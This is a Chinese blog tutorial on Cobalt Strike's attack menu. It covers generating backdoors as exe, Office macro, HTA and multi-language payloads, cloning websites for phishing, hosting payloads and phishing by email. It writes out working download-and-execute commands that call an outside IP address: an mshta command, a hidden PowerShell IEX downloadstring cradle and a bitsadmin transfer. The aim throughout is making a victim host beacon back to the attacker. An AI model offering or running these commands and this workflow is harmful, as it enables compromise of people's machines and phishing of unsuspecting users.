CS之攻击菜单详解-后门生成与上线
目录
一、生成后门
windows可执行程序exe
payload生成器
Office宏
HTA文档
二、Web钓鱼
网站克隆
文件托管
web投递
签名Applet攻击和智能Applet攻击
信息收集
站点管理
三、邮件钓鱼
在创建完监听器后 ——> CS监听器配置,接下来进行后门的生成
一、生成后门
能够生成如HTA文档、office宏、payload生成器、exe程序。
windows可执行程序exe
可以看到能生成两种windows可执行程序,其分别代表stage分阶段和unstage(stageless)不分阶段。传送门 ——> Cobalt Strike中payload的stage与unstage区别
选择监听器后,按需生成不同类型的exe
然后在目标机器运行即可上线
payload生成器
该模块可以生成多种语言的后门Payload,包括C, C#, Python, Java, Perl, Powershell脚本,Powershell命令,Ruby, Raw,免杀框架Veli中的shellcode等。
传送门 ——> CS payload生成器(Generator)介绍与上线方式
Office宏
宏病毒是一种常见的计算机病毒,寄存在文档或模板中,并不会直接感染可执行程序。但是打开携带宏病毒的文档,其中的命令就会被执行,导致文档所在电脑主机被感染。
传送门——> CobaltStrike 生成office宏病毒进行钓鱼攻击
HTA文档
HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,其里面可包含html、js、vb等语言。其和VB、C++等程序语言所设计的软件界面没什么差别。双击hta文件就能运行
CobaltStrike可生成三种类型的hta文件,分别是Executable、Powershell、VBA
这三类样本的区别在于:
- Executable 将会在hta文件中内嵌一个PE文件
- Powershell 将会在hta文件中内嵌一段Powershell代码
- VBA 将会在hta文件中内嵌一段VBA代码
1. 生成powershell类型的hta文档
类容如下
双击程序运行,主机上线
另外两种不推荐使用,因为会报错如下界面:
二、Web钓鱼
web钓鱼模块中有如下选项
网站克隆
克隆就是克隆一个与目标网站看起来一模一样的站点,然后可以在里面插入攻击代码,进行钓鱼攻击
传送门——> cs克隆目标站点
文件托管
如上,我们生成了一个hta类型的后门文件,此时需要放在目标机器上双击才能运行,这样是不是有点麻烦了?我们就想能不能把它放在自己的网站上,然后执行命令就能自动下载启动了?文件托管就是托管一个文件,提供一个文件下载
1. 对生产的evil.hta文件进行托管
如下,填写好后点击运行
生成链接,只要访问该链接就能将文件下载
运行:mshta http://39.100.88.162:80/download/file.ext,就会对该文件进行下载和运行。主机即可上线
ps: mshta是Windows内置的一个程序,主要用于执行HTA程序 ,mshta可以直接执行远端的hta程序
web投递
上面的文件托管需要我们自己选择一个文件进行托管。而web投递则是生成并托管一个payload,通过访问这个url就能下载该payload甚至直接执行。
如下填写好,可见生成的payload类型有多种
1. payload为powershell
点击运行,为一段ps脚本,意思为远程下载脚本并运行。复制此 直接在主机上运行就能自动下载payload并上线上线
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://39.xx.xx.162:80/a'))"
2. payload为powershell IEX
iex是 Invoke-Expression命令 的简写,用于执行字符串中的命令 如:iex "ls"
生成powershell iex的payload类型,可见比上面ps类型少了前面执行的部分
IEX ((new-object net.webclient).downloadstring('http://39.xx.xx.162:8000/a'))
3. payload为exe
可以直接访问下载exe
4. payload为bitsadmin
Background Intelligent Transfer Service Admin(BITSAdmin) 是一个命令行工具,可以创建下载或上传文件并监控其进度。BITSAdmin是与windows xp一起发布的。
transfer参数是从远程服务器下载到本机的简单便捷的方法。需要定义传输任务的名称,可以是任何名字。在示例中,将所有的传输任务定义为hackingarticles。在定义名称后需要输入远程服务器文件名的位置。在远程服务器上有一个名为ignite.png的示例图像文件。需要本地的路径和名称。如下例子:
bitsadmin /transfer hackingarticles http://192.168.1.13/ignite.png c:\ignite.png
所以可以利用bitsadmin工具进行payload下载与运行
在cmd中运行复制的url
如下,上线
签名Applet攻击和智能Applet攻击
- 签名Applet攻击:Java Signed Applet Attack,这个攻击会启动一个 web 服务器来托管一个自签名的 Java applet(用Java语言编写的小应用程序,可以直接嵌入到网页中,并能够产生特殊的效果。)。访客被要求给这个 applet 权限来运行。当一个访客准许了这个权限,你就获取了到他们系统的权限。
- 智能Applet攻击:Java Smart Applet Attack,这个applet分析它的环境并决定使用哪个Java漏洞利用。如果Java版本是有漏洞的,此applet会禁用安全沙箱,并使用Cobalt Strike的Java注入器执行payload。
这两攻击就不太想尝试了,因为很少很少有主机会存在applet的运行环境。(我也不知道怎么利用~~)
信息收集
生活一个网站39.100.xx.xx,只要一访问就跳转到百度的页面
然后能在 web日志中看到访问者的一些信息,如ip,访问使用的浏览器名称和版本
站点管理
以上生成的站点,我们可以在web站点管理中查看
如
三、邮件钓鱼
这个模块还是不建议使用,因为有更好的钓鱼工具,如swaks ——> swaks邮件伪造
总结
以上是生活随笔为你收集整理的CS之攻击菜单详解-后门生成与上线的全部内容,希望文章能够帮你解决所遇到的问题。
- 上一篇: 【时间序列分析】02. 线性平稳序列
- 下一篇: Sentry安装教程